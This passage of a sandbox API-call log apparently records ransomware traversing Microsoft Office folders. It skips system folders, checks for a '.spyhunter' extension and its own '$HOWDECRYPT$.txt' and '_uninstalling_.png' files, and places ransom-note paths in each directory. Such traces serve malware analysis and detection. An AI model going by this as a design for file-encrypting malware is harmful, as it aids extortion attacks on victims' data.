pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\.") returned 97 [0088.796] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.796] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.796] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.796] lstrlenW (lpString="Windows") returned 7 [0088.796] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.796] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.796] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.796] lstrlenW (lpString="System Volume Information") returned 25 [0088.796] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\..") returned 98 [0088.796] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.796] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.796] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.796] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.796] lstrlenW (lpString="Windows") returned 7 [0088.797] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.797] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.797] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.797] lstrlenW (lpString="System Volume Information") returned 25 [0088.797] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 105 [0088.797] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.797] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.797] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 105 [0088.797] GetProcessHeap () returned 0x2c0000 [0088.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x114) returned 0x379730 [0088.797] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37d468, Size=0xc08) returned 0x37f078 [0088.797] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.797] lstrcmpiW (lpString1="VisioMUI.XML", lpString2="Windows") returned -1 [0088.797] lstrlenW (lpString="Windows") returned 7 [0088.797] lstrcmpiW (lpString1="VisioMUI.XML", lpString2="$Recycle.bin") returned 1 [0088.797] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.797] lstrcmpiW (lpString1="VisioMUI.XML", lpString2="System Volume Information") returned 1 [0088.797] lstrlenW (lpString="System Volume Information") returned 25 [0088.797] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 108 [0088.797] StrStrIW (lpFirst="VisioMUI.XML", lpSrch=".spyhunter") returned 0x0 [0088.797] lstrcmpW (lpString1="VisioMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.797] lstrcmpW (lpString1="VisioMUI.XML", lpString2="_uninstalling_.png") returned 1 [0088.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 108 [0088.797] GetProcessHeap () returned 0x2c0000 [0088.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x37b7f8 [0088.797] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc10) returned 0x37f078 [0088.797] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.797] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.798] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\$HOWDECRYPT$.txt") returned 112 [0088.798] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\$HOWDECRYPT$.txt") returned 112 [0088.798] GetProcessHeap () returned 0x2c0000 [0088.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x122) returned 0x379850 [0088.798] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc18) returned 0x37f078 [0088.798] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.798] lstrcmpiW (lpString1="VISIOR", lpString2="Windows") returned -1 [0088.798] lstrlenW (lpString="Windows") returned 7 [0088.798] lstrcmpiW (lpString1="VISIOR", lpString2="$Recycle.bin") returned 1 [0088.798] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.798] lstrcmpiW (lpString1="VISIOR", lpString2="System Volume Information") returned 1 [0088.798] lstrlenW (lpString="System Volume Information") returned 25 [0088.798] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR") returned 90 [0088.798] lstrcmpW (lpString1="VISIOR", lpString2=".") returned 1 [0088.798] lstrcmpW (lpString1="VISIOR", lpString2="..") returned 1 [0088.798] GetProcessHeap () returned 0x2c0000 [0088.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.798] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*") returned 92 [0088.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.799] lstrlenW (lpString="Windows") returned 7 [0088.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.799] lstrlenW (lpString="System Volume Information") returned 25 [0088.799] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\.") returned 92 [0088.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.799] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.799] lstrlenW (lpString="Windows") returned 7 [0088.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.799] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.799] lstrlenW (lpString="System Volume Information") returned 25 [0088.799] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\..") returned 93 [0088.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.799] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.799] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.799] lstrlenW (lpString="Windows") returned 7 [0088.799] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.799] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.799] lstrlenW (lpString="System Volume Information") returned 25 [0088.800] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 100 [0088.800] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.800] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.800] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 100 [0088.800] GetProcessHeap () returned 0x2c0000 [0088.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10a) returned 0x379980 [0088.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc20) returned 0x37f078 [0088.800] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.800] lstrcmpiW (lpString1="VisiorWW.XML", lpString2="Windows") returned -1 [0088.800] lstrlenW (lpString="Windows") returned 7 [0088.800] lstrcmpiW (lpString1="VisiorWW.XML", lpString2="$Recycle.bin") returned 1 [0088.800] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.800] lstrcmpiW (lpString1="VisiorWW.XML", lpString2="System Volume Information") returned 1 [0088.800] lstrlenW (lpString="System Volume Information") returned 25 [0088.800] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0088.800] StrStrIW (lpFirst="VisiorWW.XML", lpSrch=".spyhunter") returned 0x0 [0088.800] lstrcmpW (lpString1="VisiorWW.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.800] lstrcmpW (lpString1="VisiorWW.XML", lpString2="_uninstalling_.png") returned 1 [0088.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0088.800] GetProcessHeap () returned 0x2c0000 [0088.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x110) returned 0x37a750 [0088.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc28) returned 0x37f078 [0088.800] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.800] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.800] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\$HOWDECRYPT$.txt") returned 107 [0088.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\$HOWDECRYPT$.txt") returned 107 [0088.800] GetProcessHeap () returned 0x2c0000 [0088.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x37a868 [0088.801] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc30) returned 0x37f078 [0088.801] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.801] lstrcmpiW (lpString1="Word.en-us", lpString2="Windows") returned 1 [0088.801] lstrlenW (lpString="Windows") returned 7 [0088.801] lstrcmpiW (lpString1="Word.en-us", lpString2="$Recycle.bin") returned 1 [0088.801] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.801] lstrcmpiW (lpString1="Word.en-us", lpString2="System Volume Information") returned 1 [0088.801] lstrlenW (lpString="System Volume Information") returned 25 [0088.801] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us") returned 94 [0088.801] lstrcmpW (lpString1="Word.en-us", lpString2=".") returned 1 [0088.801] lstrcmpW (lpString1="Word.en-us", lpString2="..") returned 1 [0088.801] GetProcessHeap () returned 0x2c0000 [0088.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.801] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*") returned 96 [0088.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.807] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.807] lstrlenW (lpString="Windows") returned 7 [0088.807] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.807] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.807] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.807] lstrlenW (lpString="System Volume Information") returned 25 [0088.807] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\.") returned 96 [0088.807] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.807] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.807] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.807] lstrlenW (lpString="Windows") returned 7 [0088.807] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.807] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.807] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.807] lstrlenW (lpString="System Volume Information") returned 25 [0088.807] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\..") returned 97 [0088.807] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.808] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.808] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.808] lstrlenW (lpString="Windows") returned 7 [0088.808] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.808] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.808] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.808] lstrlenW (lpString="System Volume Information") returned 25 [0088.808] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 104 [0088.808] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.808] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.808] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 104 [0088.808] GetProcessHeap () returned 0x2c0000 [0088.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x112) returned 0x376810 [0088.808] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc28) returned 0x37f078 [0088.808] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.808] lstrcmpiW (lpString1="WordMUI.XML", lpString2="Windows") returned 1 [0088.808] lstrlenW (lpString="Windows") returned 7 [0088.808] lstrcmpiW (lpString1="WordMUI.XML", lpString2="$Recycle.bin") returned 1 [0088.808] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.808] lstrcmpiW (lpString1="WordMUI.XML", lpString2="System Volume Information") returned 1 [0088.808] lstrlenW (lpString="System Volume Information") returned 25 [0088.808] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 106 [0088.808] StrStrIW (lpFirst="WordMUI.XML", lpSrch=".spyhunter") returned 0x0 [0088.808] lstrcmpW (lpString1="WordMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.809] lstrcmpW (lpString1="WordMUI.XML", lpString2="_uninstalling_.png") returned 1 [0088.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 106 [0088.809] GetProcessHeap () returned 0x2c0000 [0088.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x116) returned 0x375808 [0088.809] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc30) returned 0x37f078 [0088.809] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.809] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.809] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\$HOWDECRYPT$.txt") returned 111 [0088.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\$HOWDECRYPT$.txt") returned 111 [0088.809] GetProcessHeap () returned 0x2c0000 [0088.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x120) returned 0x37b920 [0088.809] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37f078, Size=0xc38) returned 0x3824f8 [0088.810] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0088.810] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0088.810] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\$HOWDECRYPT$.txt") returned 100 [0088.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\$HOWDECRYPT$.txt") returned 100 [0088.810] GetProcessHeap () returned 0x2c0000 [0088.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10a) returned 0x37a868 [0088.810] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc40) returned 0x3824f8 [0088.810] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.810] lstrcmpiW (lpString1="OFFREL.DLL", lpString2="Windows") returned -1 [0088.810] lstrlenW (lpString="Windows") returned 7 [0088.810] lstrcmpiW (lpString1="OFFREL.DLL", lpString2="$Recycle.bin") returned 1 [0088.810] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.810] lstrcmpiW (lpString1="OFFREL.DLL", lpString2="System Volume Information") returned -1 [0088.810] lstrlenW (lpString="System Volume Information") returned 25 [0088.810] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 70 [0088.810] StrStrIW (lpFirst="OFFREL.DLL", lpSrch=".spyhunter") returned 0x0 [0088.810] lstrcmpW (lpString1="OFFREL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.810] lstrcmpW (lpString1="OFFREL.DLL", lpString2="_uninstalling_.png") returned 1 [0088.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 70 [0088.810] GetProcessHeap () returned 0x2c0000 [0088.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340bd8 [0088.811] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc48) returned 0x3824f8 [0088.811] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.811] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="Windows") returned -1 [0088.811] lstrlenW (lpString="Windows") returned 7 [0088.811] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="$Recycle.bin") returned 1 [0088.811] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.811] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="System Volume Information") returned -1 [0088.811] lstrlenW (lpString="System Volume Information") returned 25 [0088.811] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 72 [0088.811] StrStrIW (lpFirst="OPHPROXY.DLL", lpSrch=".spyhunter") returned 0x0 [0088.811] lstrcmpW (lpString1="OPHPROXY.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.811] lstrcmpW (lpString1="OPHPROXY.DLL", lpString2="_uninstalling_.png") returned 1 [0088.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 72 [0088.811] GetProcessHeap () returned 0x2c0000 [0088.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3850c0 [0088.811] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc50) returned 0x3824f8 [0088.811] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.811] lstrcmpiW (lpString1="OPTINPS.DLL", lpString2="Windows") returned -1 [0088.811] lstrlenW (lpString="Windows") returned 7 [0088.811] lstrcmpiW (lpString1="OPTINPS.DLL", lpString2="$Recycle.bin") returned 1 [0088.811] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.811] lstrcmpiW (lpString1="OPTINPS.DLL", lpString2="System Volume Information") returned -1 [0088.811] lstrlenW (lpString="System Volume Information") returned 25 [0088.811] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 71 [0088.811] StrStrIW (lpFirst="OPTINPS.DLL", lpSrch=".spyhunter") returned 0x0 [0088.811] lstrcmpW (lpString1="OPTINPS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.811] lstrcmpW (lpString1="OPTINPS.DLL", lpString2="_uninstalling_.png") returned 1 [0088.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 71 [0088.811] GetProcessHeap () returned 0x2c0000 [0088.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340950 [0088.811] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc58) returned 0x3824f8 [0088.812] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.812] lstrcmpiW (lpString1="PJ11OD11.DLL", lpString2="Windows") returned -1 [0088.812] lstrlenW (lpString="Windows") returned 7 [0088.812] lstrcmpiW (lpString1="PJ11OD11.DLL", lpString2="$Recycle.bin") returned 1 [0088.812] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.812] lstrcmpiW (lpString1="PJ11OD11.DLL", lpString2="System Volume Information") returned -1 [0088.812] lstrlenW (lpString="System Volume Information") returned 25 [0088.812] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 72 [0088.812] StrStrIW (lpFirst="PJ11OD11.DLL", lpSrch=".spyhunter") returned 0x0 [0088.812] lstrcmpW (lpString1="PJ11OD11.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.812] lstrcmpW (lpString1="PJ11OD11.DLL", lpString2="_uninstalling_.png") returned 1 [0088.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 72 [0088.812] GetProcessHeap () returned 0x2c0000 [0088.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385360 [0088.812] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc60) returned 0x3824f8 [0088.812] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.812] lstrcmpiW (lpString1="PJRESC.DLL", lpString2="Windows") returned -1 [0088.812] lstrlenW (lpString="Windows") returned 7 [0088.812] lstrcmpiW (lpString1="PJRESC.DLL", lpString2="$Recycle.bin") returned 1 [0088.812] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.812] lstrcmpiW (lpString1="PJRESC.DLL", lpString2="System Volume Information") returned -1 [0088.812] lstrlenW (lpString="System Volume Information") returned 25 [0088.812] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 70 [0088.812] StrStrIW (lpFirst="PJRESC.DLL", lpSrch=".spyhunter") returned 0x0 [0088.812] lstrcmpW (lpString1="PJRESC.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.812] lstrcmpW (lpString1="PJRESC.DLL", lpString2="_uninstalling_.png") returned 1 [0088.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 70 [0088.812] GetProcessHeap () returned 0x2c0000 [0088.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340b00 [0088.812] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc68) returned 0x3824f8 [0088.812] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.812] lstrcmpiW (lpString1="PRJRES.DLL", lpString2="Windows") returned -1 [0088.812] lstrlenW (lpString="Windows") returned 7 [0088.813] lstrcmpiW (lpString1="PRJRES.DLL", lpString2="$Recycle.bin") returned 1 [0088.813] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.813] lstrcmpiW (lpString1="PRJRES.DLL", lpString2="System Volume Information") returned -1 [0088.813] lstrlenW (lpString="System Volume Information") returned 25 [0088.813] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 70 [0088.813] StrStrIW (lpFirst="PRJRES.DLL", lpSrch=".spyhunter") returned 0x0 [0088.813] lstrcmpW (lpString1="PRJRES.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 